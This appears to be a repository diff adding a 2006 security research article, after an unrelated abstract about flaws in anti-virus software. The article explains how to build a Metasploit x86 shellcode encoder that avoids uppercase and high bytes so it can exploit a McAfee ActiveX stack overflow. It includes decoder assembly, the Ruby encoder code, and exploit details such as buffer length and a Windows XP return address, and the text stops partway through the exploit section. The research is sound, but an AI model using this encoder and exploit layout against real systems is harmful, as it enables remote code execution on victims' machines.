Skywing
|
||||
Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems.
|
||||
txt | pdf | html
|
||||
|
817
uninformed/5.1.txt
Normal file
817
uninformed/5.1.txt
Normal file
|
@ -0,0 +1,817 @@
|
|||
Implementing a Custom X86 Encoder
|
||||
Aug, 2006
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper describes the process of implementing a custom
|
||||
encoder for the x86 architecture. To help set the stage, the McAfee
|
||||
Subscription Manager ActiveX control vulnerability, which was discovered
|
||||
by eEye, will be used as an example of a vulnerability that requires the
|
||||
implementation of a custom encoder. In particular, this vulnerability
|
||||
does not permit the use of uppercase characters. To help make things
|
||||
more interesting, the encoder described in this paper will also avoid
|
||||
all characters above 0x7f. This will make the encoder both UTF-8 safe
|
||||
and tolower safe.
|
||||
|
||||
Challenge: The author believes that a UTF-8 safe and tolower safe
|
||||
encoder could most likely be implemented in a much more optimized
|
||||
fashion that incurs far less overhead in terms of size. If any reader
|
||||
has ideas about ways in which this might be approached, feel free to
|
||||
contact the author. A bonus challenge would be to identify a geteip
|
||||
technique that can be used with these character limitations.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
In the month of August, eEye released an advisory for a stack-based
|
||||
buffer overflow that was found in the McAfee Subscription Manager
|
||||
ActiveX control. The underlying vulnerability was in an insecure call
|
||||
to vsprintf that was exposed through scripting-accessible routines. At a
|
||||
glance, this vulnerability would appear trivial to exploit given that
|
||||
it's a very basic stack overflow. However, once it comes to
|
||||
transmitting a payload, or even a particular return address, certain
|
||||
limiting factors begin to appear. The focus of this paper will center
|
||||
around an exercise in implementing a custom encoder to overcome certain
|
||||
character set limitations. The McAfee Subscription Manager vulnerability
|
||||
will be used as a real-world example of a vulnerability that requires a
|
||||
custom encoder to exploit.
|
||||
|
||||
When it comes to exploiting this vulnerability, the first step is to
|
||||
reproduce the conditions reported in the advisory. Like most
|
||||
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
|
||||
such as A's. However, in this particular exploit, sending a sequence of
|
||||
A's, which equates to 0x41, actually causes the return address to be
|
||||
overwritten with 0x61's which are lowercase a's. Judging from this, it
|
||||
seems obvious that the input string is undergoing a tolower operation
|
||||
and it will not be possible for the payload or return address to contain
|
||||
any uppercase characters.
|
||||
|
||||
Given these character restrictions, it's safe to go forward with writing
|
||||
the exploit. To simply get a proof of concept for code execution, it
|
||||
makes sense to put a series of int3's, represented by the 0xcc opcode,
|
||||
immediately following the return address. The return address could then
|
||||
be pointed to the location of a push esp / ret or some other type of
|
||||
instruction that transfers control to where the series of int3's should
|
||||
reside. Once the vulnerability is triggered, the debugger should break
|
||||
in at an int3 instruction, but that's not actually what happens.
|
||||
Instead, it breaks in on a completely different instruction:
|
||||
|
||||
|
||||
(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
|
||||
eax=00000f19 ebx=00000000 ecx=00139438
|
||||
edx=0013a384 esi=00001b58 edi=0013a080
|
||||
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
|
||||
0013a02c ec in al,dx
|
||||
0:000> u eip
|
||||
0013a02c ec in al,dx
|
||||
0013a02d ec in al,dx
|
||||
0013a02e ec in al,dx
|
||||
0013a02f ec in al,dx
|
||||
|
||||
|
||||
Again, it looks like the buffer is undergoing some sort of transformation. One
|
||||
quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
|
||||
would happen when changing an uppercase character to a lowercase character,
|
||||
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It
|
||||
appears that the operation that's performing the case lowering may also be
|
||||
inadvertently performing it on a specific high ASCII range.
|
||||
|
||||
What's actually occurring is that the subscription manager control is calling
|
||||
mbslwr, using the statically linked CRT, on a copy of the original input
|
||||
string. Internally, mbslwr calls into crtLCMapStringA. Eventually this will
|
||||
lead to a call out to kernel32!LCMapStringW. The second parameter to this
|
||||
routine is dwMapFlags which describes what sort of transformations, if any,
|
||||
should be performed on the buffer. The mbslwr routine passes 0x100, or
|
||||
LCMAP_LOWERCASE. This is what results in the lowering of the string.
|
||||
|
||||
So, given this information, it can be determined that it will not be possible
|
||||
to use characters through and including 0x41 and 0x5A as well as, for the sake
|
||||
of clarity, 0xc0 and 0xe0. In actuality, not all of the characters in this
|
||||
range are bad. The main reason this ends up causing problems is because many
|
||||
of the payload encoders out there for x86, including those in Metasploit, rely
|
||||
on characters from these two sets for their decoder stub and subsequent encoded
|
||||
data. For that reason, and for the challenge, it's worth pursuing the
|
||||
implementation of a custom encoder.
|
||||
|
||||
While this particular vulnerability will permit the use of many characters
|
||||
above 0x80, it makes the challenge that much more interesting, and particulary
|
||||
useful, to limit the usable character set to the characters described below.
|
||||
The reason this range is more useful is because the characters are UTF-8 safe
|
||||
and also tolower safe. Like most good payloads, the encoder will also avoid
|
||||
NULL bytes.
|
||||
|
||||
|
||||
0x01 -> 0x40
|
||||
0x5B -> 0x7f
|
||||
|
||||
|
||||
As with all encoded formats, there are actually two major pieces involved. The
|
||||
first part is the encoder itself. The encoder is responsible for taking a raw
|
||||
buffer and encoding it into the appropriate format. The second part is the
|
||||
decoder, which, as is probably obvious, takes the encoded form and converts it
|
||||
back into the raw form so that it can be executed as a payload. The
|
||||
implementation of these two pieces will be described in the following chapters.
|
||||
|
||||
|
||||
3) Implementing the Decoder
|
||||
|
||||
The implementation of the decoder involves taking the encoded form and
|
||||
converting it back into the raw form. This must all be done using assembly
|
||||
instructions that will execute natively on the target machine after an exploit
|
||||
has succeeded and it must also use only those instructions that fall within the
|
||||
valid character set. To accomplish this, it makes sense to figure out what
|
||||
instructions are available out of the valid character set. To do that, it's as
|
||||
simple as generating all of the permutations of the valid characters in both
|
||||
the first and second byte positions. This provides a pretty good idea of what's
|
||||
available. The end-result of such a process is a list of about 105 unique
|
||||
instructions (independent of operand types). Of those instructions the most
|
||||
interesting are listed below:
|
||||
|
||||
|
||||
add
|
||||
sub
|
||||
imul
|
||||
inc
|
||||
cmp
|
||||
jcc
|
||||
pusha
|
||||
push
|
||||
pop
|
||||
and
|
||||
or
|
||||
xor
|
||||
|
||||
|
||||
Some very useful instructions are available, such as add, xor, push, pop, and a
|
||||
few jcc's. While there's an obvious lack of the traditional mov instruction,
|
||||
it can be made up for through a series of push and pop instructions, if needed.
|
||||
With the set of valid instructions identified, it's possible to begin
|
||||
implementing the decoder. Most decoders will involve three implementation
|
||||
phases. The first phase is used to determine the base address of the decoder
|
||||
stub using a geteip technique. Following that, the encoded data must be
|
||||
transformed from its character-safe form to the form that it will actually
|
||||
execute from. Finally, the decoder must transfer control into the decoded data
|
||||
so that the actual payload can begin executing. These three steps will be
|
||||
described in the following sections.
|
||||
|
||||
In order to better understand the following sections, it's important to
|
||||
describe the general approach that is going to be taken to implement the
|
||||
decoder. The stub header is used to prepare the necessary state for the decode
|
||||
transforms. The transforms themselves take the encoded data, as a series of
|
||||
four byte blocks, and translate it using the process described in section .
|
||||
Finally, execution falls through to the decoded data that is stored in place of
|
||||
the encoded data.
|
||||
|
||||
|
||||
3.1) Determining the Stub's Base Address
|
||||
|
||||
|
||||
The first step in most decoder stubs will require the use of a series of
|
||||
instructions, also referred to as geteip code, that obtain the location of the
|
||||
current instruction pointer. The reason this is necessary is because most
|
||||
decoders will have the encoded data placed immediately following the decoder
|
||||
stub in memory. In order to operate on the encoded data using an absolute
|
||||
address, it is necessary to determine where the data is at. If the decoder
|
||||
stub can determine the address that it's executing from, then it can determine
|
||||
the address of the encoded data immediately following it in memory in a
|
||||
position-independent fashion. As one might expect, the character limitations of
|
||||
this challenge make it quite a bit harder to get the value current instruction
|
||||
pointer.
|
||||
|
||||
There are a number of different techniques that can be used to get the value of
|
||||
the instruction pointer on x86. However, the majority of these techniques rely
|
||||
on the use of the call instruction. The problem with the use of the call
|
||||
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
|
||||
or 0xff. Another technique that can be used to get the instruction pointer is
|
||||
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
|
||||
of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
|
||||
structured exception handling to get the instruction pointer. This is
|
||||
accomplished by registering an exception handler and extracting the Eip value
|
||||
from the CONTEXT structure when an exception is generated. In fact, this
|
||||
approach has even been implemented in entirely alphanumeric form for Windows by
|
||||
SkyLined. Unfortunately, it can't be used in this case because it relies on
|
||||
uppercase characters.
|
||||
|
||||
With all of the known geteip techniques unusable, it seems like some
|
||||
alternative method for getting the base address of the decoder stub will be
|
||||
needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
|
||||
is common for the decoder stub to assume that a certain register contains the
|
||||
base address of the decoder stub. This assumption makes the decoder more
|
||||
complicated to use because it can't simply be dropped into any exploit and be
|
||||
expected to work. Instead, exploits may need to be modified in order to ensure
|
||||
that a register can be found that contains the location, or some location near,
|
||||
the decoder stub.
|
||||
|
||||
At the time of this writing, the author is not aware of a geteip technique that
|
||||
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
|
||||
payloads, the decoder described in this paper will be implemented using a
|
||||
register that is explicitly assumed to contain a reference to some address that
|
||||
is near the base address of the decoder stub. For this document, the register
|
||||
that is assumed to hold the address will be ecx, but it is equally possible to
|
||||
use other registers.
|
||||
|
||||
For this particular decoder, determining the base address is just the first
|
||||
step involved in implementing the stub's header. Once the base address has
|
||||
been determined, the decoder must adjust the register that holds the base
|
||||
address to point to the location of the encoded data. The reason this is
|
||||
necessary is because the next step of the decoder, the transforms, depend on
|
||||
knowing the location of the encoded data that they will be operating on. In
|
||||
order to calculate this address, the decoder must add the size of the stub
|
||||
header plus the size of the all of the decode transforms to the register that
|
||||
holds the base address. The end result should be that the register will hold
|
||||
the address of the first encoded block.
|
||||
|
||||
The following disassembly shows one way that the stub header might be
|
||||
implemented. In this disassembly, ecx is assumed to point at the beginning of
|
||||
the stub header:
|
||||
|
||||
|
||||
00000000 6A12 push byte +0x12
|
||||
00000002 6B3C240B imul edi,[esp],byte +0xb
|
||||
00000006 60 pusha
|
||||
00000007 030C24 add ecx,[esp]
|
||||
0000000A 6A19 push byte +0x19
|
||||
0000000C 030C24 add ecx,[esp]
|
||||
0000000F 6A04 push byte +0x4
|
||||
|
||||
|
||||
The purpose of the first two instructions is to calculate the number of bytes
|
||||
consumed by all of the decode transforms (which are described in section ). It
|
||||
accomplishes this by multiplying the size of each transform, which is 0xb
|
||||
bytes, by the total number of transforms, which in this example 0x12. The
|
||||
result of the multiplication, 0xc6, is stored in edi. Since each transform is
|
||||
capable of decoding four bytes of the raw payload, the maximum number of bytes
|
||||
that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting
|
||||
factor, though, as other combinations of imul can be used to account for larger
|
||||
payloads.
|
||||
|
||||
Once the size of the decode transforms has been calculated, pusha is executed
|
||||
in order to place the edi register at the top of the stack. With the value of
|
||||
edi at the top of the stack, the value can be added to the base address
|
||||
register ecx, thus accounting for the number of bytes used by the decode
|
||||
transforms. The astute reader might ask why the value of edi is indirectly
|
||||
added to ecx. Why not just add it directly? The answer, of course, is due to
|
||||
bad characters:
|
||||
|
||||
|
||||
00000000 01F9 add ecx,edi
|
||||
|
||||
|
||||
It's also not possible to simply push edi onto the stack, because the push edi
|
||||
instruction also contains bad characters:
|
||||
|
||||
|
||||
00000000 57 push edi
|
||||
|
||||
|
||||
Starting with the fifth instruction, the size of the stub header, plus any
|
||||
other offsets that may need to be accounted for, are added to the base address
|
||||
in order to shift the ecx register to point at the start of the encoded data.
|
||||
This is accomplished by simply pushing the the number of bytes to add onto the
|
||||
stack and then adding them to the ecx register indirectly by adding through
|
||||
[esp].
|
||||
|
||||
After these instructions are finished, ecx will point to the start of the
|
||||
encoded data. The final instruction in the stub header is a push byte 0x4. This
|
||||
instruction isn't actually used by the stub header, but it's there to set up
|
||||
some necessary state that will be used by the decode transforms. It's use will
|
||||
be described in the next section.
|
||||
|
||||
|
||||
3.2) Transforming the Encoded Data
|
||||
|
||||
The most important part of any decoder is the way in which it transforms the
|
||||
data from its encoded form to its actual form. For example, many of the
|
||||
decoders used in the Metasploit Framework and elsewhere will xor a portion of
|
||||
the encoded data with a key that results in the actual bytes of the original
|
||||
payload being produced. While this an effective way of obtaining the desired
|
||||
results, it's not possible to use such a technique with the character set
|
||||
limitations currently defined in this paper.
|
||||
|
||||
In order to transform encoded data back to its original form, it must be
|
||||
possible to produce any byte from 0x00 to 0xff using any number of combinations
|
||||
of bytes that fall within the valid character set. This means that this
|
||||
decoder will be limited to using combinations of character that fall within
|
||||
0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
|
||||
accomplishing the transformation, it makes sense to investigate each of the
|
||||
useful instructions that were identified earlier in this chapter.
|
||||
|
||||
The bitwise instructions, such as and, or, and xor are not going to be
|
||||
particularly useful to this decoder. The main reason for this is that they are
|
||||
unable to produce values that reside outside of the valid character sets
|
||||
without the aide of a bit shifting instruction. For example, it is impossible
|
||||
to bitwise-and two non-zero values in the valid character set together to
|
||||
produce 0x00. While xor could be used to accomplish this, that's about all that
|
||||
it could do other than producing other values below the 0x80 boundary. These
|
||||
restrictions make the bitwise instructions unusable.
|
||||
|
||||
The imul instruction could be useful in that it is possible to multiply two
|
||||
characters from the valid character set together to produce values that reside
|
||||
outside of the valid character set. For example, multiplying 0x02 by 0x7f
|
||||
produces 0xfe. While this may have its uses, there are two remaining
|
||||
instructions that are actually the most useful.
|
||||
|
||||
The add instruction can be used to produce almost all possible characters.
|
||||
However, it's unable to produce a few specific values. For example, it's
|
||||
impossible to add two valid characters together to produce 0x00. It is also
|
||||
impossible to add two valid characters together to produce 0xff and 0x01.
|
||||
While this limitation may make it appear that the add instruction is unusable,
|
||||
its saving grace is the sub instruction.
|
||||
|
||||
Like the add instruction, the sub instruction is capable of producing almost
|
||||
all possible characters. It is certainly capable of producing the values that
|
||||
add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
|
||||
It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
|
||||
produce by subtracting 0x02 from 0x03. However, like the add instruction,
|
||||
there are also characters that the sub instruction cannot produce. These
|
||||
characters include 0x7f, 0x80, and 0x81.
|
||||
|
||||
Given this analysis, it seems that using add and sub in combination is most
|
||||
likely going to be the best choice when it comes to transforming encoded data
|
||||
for this decoder. With the fundamental operations selected, the next step is
|
||||
to attempt to implement the code that actually performs the transformation. In
|
||||
most decoders, the transform will be accomplished through a loop that simply
|
||||
performs the same operation on a pointer that is incremented by a set number of
|
||||
bytes each iteration. This type of approach results in all of the encoded data
|
||||
being decoded prior to executing it. Using this type of technique is a little
|
||||
bit more complicated for this decoder, though, because it can't simply rely on
|
||||
the use of a static key and it's also limited in terms of what instructions it
|
||||
can use within the loop.
|
||||
|
||||
For these reasons, the author decided to go with an alternative technique for
|
||||
the transformation portion of the decoder stub. Rather than using a loop that
|
||||
iterates over the encoded data, the author chose to use a series of sequential
|
||||
transformations where each block of the encoded data was decoded. This
|
||||
technique has been used before in similar situations. One negative aspect of
|
||||
using this approach over a loop-based approach is that it substantially
|
||||
increases the size of the encoded payload. While figure gives an idea of the
|
||||
structure of the decoder, it doesn't give a concrete understanding of how it's
|
||||
actually implemented. It's at this point that one must descend from the lofty
|
||||
high-level. What better way to do this than diving right into the disassembly?
|
||||
|
||||
|
||||
00000011 6830703C14 push dword 0x143c7030
|
||||
00000016 5F pop edi
|
||||
00000017 0139 add [ecx],edi
|
||||
00000019 030C24 add ecx,[esp]
|
||||
|
||||
|
||||
The form of each transform will look exactly like this one. What's actually
|
||||
occurring is a four byte value is pushed onto the stack and then popped into
|
||||
the edi register. This is done in place of a mov instruction because the mov
|
||||
instruction contains invalid characters. Once the value is in the edi
|
||||
register, it is either added to or subtracted from its respective encoded data
|
||||
block. The result of the add or subtract is stored in place of the previously
|
||||
encoded data. Once the transform has completed, it adds the value at the top
|
||||
of the stack, which was set to 0x4 in the decoder stub header, to the register
|
||||
that holds the pointer into the encoded data. This results in the pointer
|
||||
moving on to the next encoded data block so that the subsequent transform will
|
||||
operate on the correct block.
|
||||
|
||||
This simple process is all that's necessary to perform the transformations
|
||||
using only valid characters. As mentioned above, one of the negative aspects
|
||||
of this approach is that it does add quite a bit of overhead to the original
|
||||
payload. For each four byte block, 11 bytes of overhead are added. The
|
||||
approach is also limited by the fact that if there is ever a portion of the raw
|
||||
payload that contains characters that add cannot handle, such as 0x00, and also
|
||||
contains characters that sub cannot handle, such as 0x80, then it will not be
|
||||
possible to encode it.
|
||||
|
||||
|
||||
3.3) Transferring Control to the Decoded Data
|
||||
|
||||
Due to the way the decoder is structured, there is no need for it to include
|
||||
code that directly transfers control to the decoded data. Since this decoder
|
||||
does not use any sort of looping, execution control will simply fall through to
|
||||
the decoded data after all of the transformations have completed.
|
||||
|
||||
|
||||
4) Implementing the Encoder
|
||||
|
||||
The encoder portion is made up of code that runs on an attacker's machine prior
|
||||
to exploiting a target. It converts the actual payload that will be executed
|
||||
into the encoded format and then transmits the encoded form as the payload.
|
||||
Once the target begins executing code, the decoder, as described in chapter ,
|
||||
converts the encoded payload back into its raw form and then executes it.
|
||||
|
||||
For the purposes of this document, the client-side encoder was implemented in
|
||||
the 3.0 version of the Metasploit Framework as an encoder module for x86. This
|
||||
chapter will describe what was actually involved in implementing the encoder
|
||||
module for the Metasploit Framework.
|
||||
|
||||
The very first step involved in implementing the encoder is to create the
|
||||
appropriate file and set up the class so that it can be loaded into the
|
||||
framework. This is accomplished by placing the encoder module's file in the
|
||||
appropriate directory, which in this case is modules/encoders/x86. The name of
|
||||
the module's file is important only in that the module's reference name is
|
||||
derived from the filename. For example, this encoder can be referenced as
|
||||
x86/avoidutf8tolower based on its filename. In this case, the module's
|
||||
filename is avoidutf8tolower.rb. Once the file is created in the appropriate
|
||||
location, the next step is to define the class and provide the framework with
|
||||
the appropriate module information.
|
||||
|
||||
To define the class, it must be placed in the appropriate namespace that
|
||||
reflects where it is at on the filesystem. In this case, the module is placed
|
||||
in the Msf::Encoders::X86 namespace. The name of the class itself is not
|
||||
important so long as it is unique within the namespace. When defining the
|
||||
class, it is important that it inherit from the Msf::Encoder base class at some
|
||||
level. This ensures that it implements all the required methods for an encoder
|
||||
to function when the framework is interacting with it.
|
||||
|
||||
At this point, the class definition should look something like this:
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
module Encoders
|
||||
module X86
|
||||
|
||||
class AvoidUtf8 < Msf::Encoder
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
With the class defined, the next step is to create a constructor and to pass
|
||||
the appropriate module information down to the base class in the form of the
|
||||
info hash. This hash contains information about the module, such as name,
|
||||
version, authorship, and so on. For encoder modules, it also conveys
|
||||
information about the type of encoder that's being implemented as well as
|
||||
information specific to the encoder, like block size and key size. For this
|
||||
module, the constructor might look something like this:
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Avoid UTF8/tolower',
|
||||
'Version' => '$Revision: 1.3 $',
|
||||
'Description' => 'UTF8 Safe, tolower Safe Encoder',
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_X86,
|
||||
'License' => MSF_LICENSE,
|
||||
'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
|
||||
'Decoder' =>
|
||||
{
|
||||
'KeySize' => 4,
|
||||
'BlockSize' => 4,
|
||||
})
|
||||
end
|
||||
|
||||
|
||||
With all of the boilerplate code out of the way, it's time to finally get into
|
||||
implementing the actual encoder. When implementing encoder modules in the 3.0
|
||||
version of the Metasploit Framework, there are a few key methods that can
|
||||
overridden by a derived class. These methods are described in detail in the
|
||||
developer's guide, so an abbreviated explanation of only those useful to this
|
||||
encoder will be given here. Each method will be explained in its own
|
||||
individual section.
|
||||
|
||||
4.1) decoder_stub
|
||||
|
||||
First and foremost, the decoderstub method gives an encoder module the
|
||||
opportunity to dynamically generate a decoder stub. The framework's idea of
|
||||
the decoder stub is equivalent to the stub header described in chapter . In
|
||||
this case, it must simply provide a buffer whose assembly will set up a
|
||||
specific register to point to the start of the encoded data blocks as described
|
||||
in section . The completed version of this method might look something like
|
||||
this:
|
||||
|
||||
|
||||
def decoder_stub(state)
|
||||
len = ((state.buf.length + 3) & (~0x3)) / 4
|
||||
|
||||
off = (datastore['BufferOffset'] || 0).to_i
|
||||
|
||||
decoder =
|
||||
"\x6a" + [len].pack('C') + # push len
|
||||
"\x6b\x3c\x24\x0b" + # imul 0xb
|
||||
"\x60" + # pusha
|
||||
"\x03\x0c\x24" + # add ecx, [esp]
|
||||
"\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
|
||||
"\x03\x0c\x24" + # add ecx, [esp]
|
||||
"\x6a\x04" # push byte 0x4
|
||||
|
||||
state.context = ''
|
||||
|
||||
return decoder
|
||||
end
|
||||
|
||||
|
||||
In this routine, the length of the raw buffer, as found through
|
||||
state.buf.length, is aligned up to a four byte boundary and then divided by
|
||||
four. Following that, an optional buffer offset is stored in the off local
|
||||
variable. The purpose of the BufferOffset optional value is to allow exploits
|
||||
to cause the encoder to account for extra size overhead in the ecx register
|
||||
when doing its calculations. The decoder stub is then generated using the
|
||||
calculated length and offset to produce the stub header. The stub header is
|
||||
then returned to the caller.
|
||||
|
||||
|
||||
4.2) encode_block
|
||||
|
||||
The next important method to override is the encode_block method. This method
|
||||
is used by the framework to allow an encoder to encode a single block and
|
||||
return the resultant encoded buffer. The size of each block is provided to the
|
||||
framework through the encoder's information hash. For this particular encoder,
|
||||
the block size is four bytes. The implementation of the encode_block routine is
|
||||
as simple as trying to encode the block using either the add instruction or the
|
||||
sub instruction. Which instruction is used will depend on the bytes in the
|
||||
block that is being encoded.
|
||||
|
||||
|
||||
def encode_block(state, block)
|
||||
buf = try_add(state, block)
|
||||
|
||||
if (buf.nil?)
|
||||
buf = try_sub(state, block)
|
||||
end
|
||||
|
||||
if (buf.nil?)
|
||||
raise BadcharError.new(state.encoded, 0, 0, 0)
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
|
||||
The first thing encode_block tries is add. The try_add method is implemented as
|
||||
shown below:
|
||||
|
||||
|
||||
def try_add(state, block)
|
||||
buf = "\x68"
|
||||
vbuf = ''
|
||||
ctx = ''
|
||||
|
||||
block.each_byte { |b|
|
||||
return nil if (b == 0xff or b == 0x01 or b == 0x00)
|
||||
|
||||
begin
|
||||
xv = rand(b - 1) + 1
|
||||
end while (is_badchar(state, xv) or is_badchar(state, b - xv))
|
||||
|
||||
vbuf += [xv].pack('C')
|
||||
ctx += [b - xv].pack('C')
|
||||
}
|
||||
|
||||
buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"
|
||||
|
||||
state.context += ctx
|
||||
|
||||
return buf
|
||||
end
|
||||
|
||||
|
||||
The try_add routine enumerates each byte in the block, trying to find a random
|
||||
byte that, when added to another random byte, produces the byte value in the
|
||||
block. The algorithm it uses to accomplish this is to loop selecting a random
|
||||
value between 1 and the actual value. From there a check is made to ensure
|
||||
that both values are within the valid character set. If they are both valid,
|
||||
then one of the values is stored as one of the bytes of the 32-bit immediate
|
||||
operand to the push instruction that is part of the decode transform for the
|
||||
current block. The second value is appended to the encoded block context.
|
||||
After all bytes have been considered, the instructions that compose the decode
|
||||
transform are completed and the encoded block context is appended to the string
|
||||
of encoded blocks. Finally, the decode transform is returned to the framework.
|
||||
|
||||
In the event that any of the bytes that compose the block being encoded by
|
||||
try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this
|
||||
happens, the encode_block routine will attempt to encode the block using the sub
|
||||
instruction. The implementation of the try_sub routine is shown below:
|
||||
|
||||
|
||||
def try_sub(state, block)
|
||||
buf = "\x68";
|
||||
vbuf = ''
|
||||
ctx = ''
|
||||
carry = 0
|
||||
|
||||
block.each_byte { |b|
|
||||
return nil if (b == 0x80 or b == 0x81 or b == 0x7f)
|
||||
|
||||
x = 0
|
||||
y = 0
|
||||
prev_carry = carry
|
||||
|
||||
begin
|
||||
carry = prev_carry
|
||||
|
||||
if (b > 0x80)
|
||||
diff = 0x100 - b
|
||||
y = rand(0x80 - diff - 1).to_i + 1
|
||||
x = (0x100 - (b - y + carry))
|
||||
carry = 1
|
||||
else
|
||||
diff = 0x7f - b
|
||||
x = rand(diff - 1) + 1
|
||||
y = (b + x + carry) & 0xff
|
||||
carry = 0
|
||||
end
|
||||
|
||||
end while (is_badchar(state, x) or is_badchar(state, y))
|
||||
|
||||
vbuf += [x].pack('C')
|
||||
ctx += [y].pack('C')
|
||||
}
|
||||
|
||||
buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"
|
||||
|
||||
state.context += ctx
|
||||
|
||||
return buf
|
||||
end
|
||||
|
||||
|
||||
Unlike the try_add routine, the try_sub routine is a little bit more
|
||||
complicated, perhaps unnecessarily. The main reason for this is that
|
||||
subtracting two 32-bit values has to take into account things like carrying
|
||||
from one digit to another. The basic idea is the same. Each byte in the block
|
||||
is enumerated. If the byte is above 0x80, the routine calculates the
|
||||
difference between 0x100 and the byte. From there, it calculates the y value
|
||||
as a random number between 1 and 0x80 minus the difference. Using the y value,
|
||||
it generates the x value as 0x100 minus the byte value minus y plus the current
|
||||
carry flag. To better understand this, consider the following scenario.
|
||||
|
||||
Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
|
||||
is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
|
||||
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
|
||||
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.
|
||||
|
||||
However, if the byte value is less than 0x80, then a different method is used
|
||||
to select the x and y values. In this case, the difference is calculated as
|
||||
0x7f minus the value of the current byte. The value of x is then assigned a
|
||||
random value between 1 and the difference. The value of y is then calculated
|
||||
as the current byte plus x plus the carry flag. For example, if the value is
|
||||
0x24, then the values could be calculated as described in the following
|
||||
scenario.
|
||||
|
||||
First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
|
||||
0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be
|
||||
calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.
|
||||
|
||||
Given these two methods of calculating the individual byte values, it's
|
||||
possible to encode all byte with the exception of 0x7f, 0x80, and 0x81. If any
|
||||
one of these three bytes is encountered, the try_sub routine will return nil
|
||||
and the encoding will fail. Otherwise, the routine will complete in a fashion
|
||||
similar to the try_add routine. However, rather than using an add instruction,
|
||||
it uses the sub instruction.
|
||||
|
||||
4.3) encode_end
|
||||
|
||||
|
||||
With all the encoding cruft out of the way, the final method that needs to be
|
||||
overridden is encode_end. In this method, the state.context attribute is
|
||||
appended to the state.encoded. The purpose of the state.context attribute is
|
||||
to hold all of the encoded data blocks that are created over the course of
|
||||
encoding each block. The state.encoded attribute is the actual decoder
|
||||
including the stub header, the decode transformations, and finally, the encoded
|
||||
data blocks.
|
||||
|
||||
|
||||
def encode_end(state)
|
||||
state.encoded += state.context
|
||||
end
|
||||
|
||||
|
||||
Once encoding completes, the result might be a disassembly that looks something
|
||||
like this:
|
||||
|
||||
|
||||
$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
|
||||
./msfencode -e x86/avoid_utf8_tolower -t raw | \
|
||||
ndisasm -u -
|
||||
[*] x86/avoid_utf8_tolower succeeded, final size 47
|
||||
|
||||
00000000 6A02 push byte +0x2
|
||||
00000002 6B3C240B imul edi,[esp],byte +0xb
|
||||
00000006 60 pusha
|
||||
00000007 030C24 add ecx,[esp]
|
||||
0000000A 6A11 push byte +0x11
|
||||
0000000C 030C24 add ecx,[esp]
|
||||
0000000F 6A04 push byte +0x4
|
||||
00000011 683C0C190D push dword 0xd190c3c
|
||||
00000016 5F pop edi
|
||||
00000017 0139 add [ecx],edi
|
||||
00000019 030C24 add ecx,[esp]
|
||||
0000001C 68696A6060 push dword 0x60606a69
|
||||
00000021 5F pop edi
|
||||
00000022 0139 add [ecx],edi
|
||||
00000024 030C24 add ecx,[esp]
|
||||
00000027 06 push es
|
||||
00000028 1467 adc al,0x67
|
||||
0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c
|
||||
0000002E 6C insb
|
||||
|
||||
|
||||
5) Applying the Encoder
|
||||
|
||||
The whole reason that this encoder was originally needed was to take advantage
|
||||
of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
|
||||
that the encoder has been implemented, all that's left is to try it out and see
|
||||
if it works. To test this against a Windows XP SP0 target, the overflow buffer
|
||||
might be constructed as follows.
|
||||
|
||||
First, a string of 2972 random text characters must be generated. The return
|
||||
address should follow the random character string. An example of a valid
|
||||
return address for this target is 0x7605122f which is the location of a jmp esp
|
||||
instruction in shell32.dll. Immediately following the return address in the
|
||||
overflow buffer should be a series of five instructions:
|
||||
|
||||
|
||||
00000000 60 pusha
|
||||
00000001 6A01 push byte +0x1
|
||||
00000003 6A01 push byte +0x1
|
||||
00000005 6A01 push byte +0x1
|
||||
00000007 61 popa
|
||||
|
||||
|
||||
